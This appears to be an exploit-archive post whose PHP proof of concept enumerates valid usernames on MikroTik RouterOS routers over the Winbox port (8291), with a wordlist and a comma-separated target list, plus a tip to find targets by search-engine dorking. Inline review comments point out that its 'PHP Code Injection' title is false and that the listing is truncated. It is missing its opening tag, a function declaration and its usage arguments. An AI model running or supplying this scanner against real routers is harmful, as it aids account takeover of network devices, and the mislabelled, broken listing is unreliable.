=============================================================================================================================================
| # Title : MikroTik RouterOS WinBox 3.41 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://mikrotik.com/download |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: This code torrents usernames on MikroTik RouterOS via port 8291 (Winbox specific port) using wordlist. Identification: Identification by length of probe whether the username is valid or not.
[+] save code as poc.php .
[+] USage : php poc.php wordlist.txt 192.168.1.1,192.168.1.2
[+] PayLoad :
// NOTE(review): despite the "PHP Code Injection" title, nothing below injects
// code anywhere. The script is a username-enumeration probe: it opens a TCP
// connection to the Winbox port, sends one fixed-format packet per wordlist
// entry and classifies the reply by its length alone. Its own docblock
// ("Identification by length of probe") says the same.
//
// NOTE(review): the listing was extracted from a rendered page and lost its
// opening `<?php` tag, the declaration of read_wordlist() and (in the usage
// string further down) the argument placeholders that were written like HTML
// tags. Only the tail of read_wordlist() survives: an exception handler that
// echoes the message, followed by the return of the loaded list.
getMessage() . "\n";
    }
    return $wordlist;
}

// Build the probe for one username. The first byte of the base payload is
// replaced by chr(0x22 + strlen($username)), i.e. it is used as a length
// field; then the second byte of the base payload, the username itself, and
// everything from the third byte onward are appended unchanged.
// strlen() counts bytes, so this assumes plain single-byte usernames from the
// wordlist — non-ASCII entries would produce a length that does not match the
// character count.
function create_payload($base_payload, $username)
{
    $length = strlen($username);
    $first_byte = chr(0x22 + $length); // rewrite the first byte of the payload
    return $first_byte . substr($base_payload, 1, 1) . $username . substr($base_payload, 2);
}

// Classify a reply purely by its byte length: 51 bytes is reported as
// "valid", 35 bytes as "invalid", any other length as "unknown".
// NOTE(review): these two magic lengths are the entire oracle and are not
// explained anywhere on the page; they are presumably specific to the
// RouterOS/Winbox build the author probed, so other builds will mostly land in
// "unknown". Note also that fread() below reads at most 1024 bytes of whatever
// happens to have arrived, so a partial read also ends up as "unknown".
function process_response($response)
{
    $response_length = strlen($response);
    if ($response_length == 51) {
        return "valid";
    } elseif ($response_length == 35) {
        return "invalid";
    } else {
        return "unknown";
    }
}

// Run the whole wordlist against one host:port and return the usernames whose
// reply was classified "valid".
// Behaviour that matters from the defender's side: every wordlist entry is a
// brand-new TCP connection to the Winbox port (5-second connect timeout,
// connection errors silenced with `@` and merely echoed), one write, one read
// of up to 1024 bytes, a close, then a 1-3 second pause. Seen from the router,
// that is a steady stream of short-lived Winbox connections from a single
// source address, one per candidate name — a pattern worth alerting on, and
// one that is neutralised by not exposing the Winbox service to untrusted
// networks and restricting it to management addresses.
function scan_target($host, $port, $wordlist, $base_payload)
{
    echo "Scanning $host:$port...\n";
    $valid_usernames = [];
    foreach ($wordlist as $username) {
        $socket = @stream_socket_client("tcp://$host:$port", $errno, $errstr, 5); // connect to the server
        if (!$socket) {
            echo "Error connecting to $host:$port for username $username: $errstr ($errno)\n";
            continue;
        }
        $payload = create_payload($base_payload, $username);
        echo "Sending payload for username: $username\n";
        fwrite($socket, $payload);
        // wait for the server's reply (a single read; no stream timeout is set,
        // so a silent peer can block this call)
        $response = fread($socket, 1024);
        $result = process_response($response);
        if ($result == "valid") {
            $valid_usernames[] = $username;
            echo "Valid username found: $username\n";
        } elseif ($result == "invalid") {
            echo "Invalid username: $username\n";
        }
        fclose($socket);
        // random delay between attempts (between 1 and 3 seconds)
        sleep(rand(1, 3));
    }
    return $valid_usernames;
}

// Entry point for a scan across several targets: load the wordlist once,
// then run scan_target() per host and print the result line for each.
// $base_payload is the fixed packet template: two header bytes followed by a
// run of zero bytes; create_payload() patches its first byte and splices the
// username in after the second byte.
function main($targets, $port, $wordlist_path)
{
    $wordlist = read_wordlist($wordlist_path);
    if (empty($wordlist)) {
        echo "Wordlist is empty or could not be loaded.\n";
        return;
    }
    $base_payload = "\x22\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
    foreach ($targets as $target) {
        $valid_usernames = scan_target($target, $port, $wordlist, $base_payload);
        echo "Results for $target: " . (empty($valid_usernames) ? "No valid usernames found" : implode(", ", $valid_usernames)) . "\n";
    }
}

// Command-line driver: argv[1] is the wordlist path, argv[2] a comma-separated
// list of hosts; the port is fixed to 8291 (Winbox).
// NOTE(review): the usage string below is missing the argument names — they
// were most likely written as `<wordlist> <targets>` and stripped as HTML by
// the page that served this listing.
if ($argc < 3) {
    echo "Usage: php mikrotik_routeros_userenum_wordlist.php \n";
    exit(1);
}
$wordlist_path = $argv[1];
$targets = explode(",", $argv[2]);
$port = 8291;
main($targets, $port, $wordlist_path);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================